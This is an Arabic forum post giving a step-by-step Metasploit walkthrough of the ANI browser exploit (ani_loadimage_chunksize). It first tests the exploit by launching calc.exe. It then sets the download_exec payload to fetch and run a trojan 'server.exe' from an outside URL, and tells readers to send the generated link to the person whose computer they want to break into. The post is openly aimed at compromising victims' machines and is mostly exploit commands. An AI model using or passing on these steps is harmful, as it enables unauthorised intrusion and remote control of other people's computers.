أهلا وسهلا بك زائرنا الكريم، إذا كانت هذه زيارتك الأولى للمنتدى، فيرجى التكرم بزيارة صفحة التعليمـــات، بالضغط هنا.كما يشرفنا أن تقوم بالتسجيل بالضغط هنا إذا رغبت بالمشاركة في المنتدى، أما إذا رغبت بقراءة المواضيع والإطلاع فتفضل بزيارة القسم الذي ترغب أدناه.
قبل ما نبدأ حمل البرنامج http://framework.m e t a sploit.com/...mework-3.0.exe ستظهر لك صفحت اظغط على IACCEPT this licens شرح البرنامج ************************************************** ********** إفتح البرنامج
وإفتح الرابط التالي عن طريق المتصفح
http://127.0.0.1:55555
وإظغط على console
وحتجينا الواجهة اللي حنطبق عليها الشرح
وإتأكد انه مجموع الثغرات فوق ال 183
الآن أكتب الآمر التالي
show exploits
وحتجينا جميع الثغرات
ثغرات المتصفح تبدأ ب w i n d o w s/browser
طيب انا حشرح اخر ثغرة نزلت اللي هيا ثغرة ani
اكتب الآمر التالي لإستخدامها
use w i n d o w s/browser/ani_loadimage_chunksize
الآن نستخدم بايلود
طيب بعض منكم يسألوا ايش هوا البايلود؟؟
البايلود يعني ايش تسوي بعد ما تخترق تحمل باتش ولا تفتح بورت .....الخ البرنامج فيه بايلودات كثيره نختار اللي يناسبنا
اكتب الآمر التالي لعرض جميع البايلودات show payloads
طيب الآن نسوي تجربه ونستخدم بايلود لكتابة الآوامر ونكتب فيه الآمر calc.exe وهو آمر لتشغيل الآلة الحاسبة ونجربه على نفسنا ونشوف هل الآلة الحاسبة تشتغل ؟ اذا كانت تشتغل يعني الثغرة شغالة 100 اكتب الآوامر التالية set payload w i n d o w s/exec
هذا الآمر لإستخدام بايلود كتابة الآوامر set cmd calc.exe وهذا الآمر لجعله يشغل الآلة الحاسبة واكتب exploit لبدأ الثغرة
مثل مانتو ملاحظين البرنامج اعطانا رابط انسخ الرابط والصقه في المتصفح وحتشتغل الآلة الحاسبة في جهازك
طيب الآن نغير البايلود ونستخدم بايلود لتنزيل الباتش
اكتب الآوامر التآلية
unset payload
وهو الآمر للتراجع عن استخدام البايلود
set payload w i n d o w s/download_exec
آمر لإستخدام بايلود لتنزيل الباتش في جهاز الضحية set url http://alm3refh.com/server.exe مع استبدال رابط سيرفرك
set srvhost 192.168.10.10
مع استبدال عنوان جهازك ip
واكتب exploit لبدأ الثغرة
مثل ما انتم شايفين في الصورة البرنامج اعطانا رابط الرابط هذا اعطيه الى الدي تريد ان تخترق جهازه لوعاوزين اكمل اكمل بس انا منتظر الردود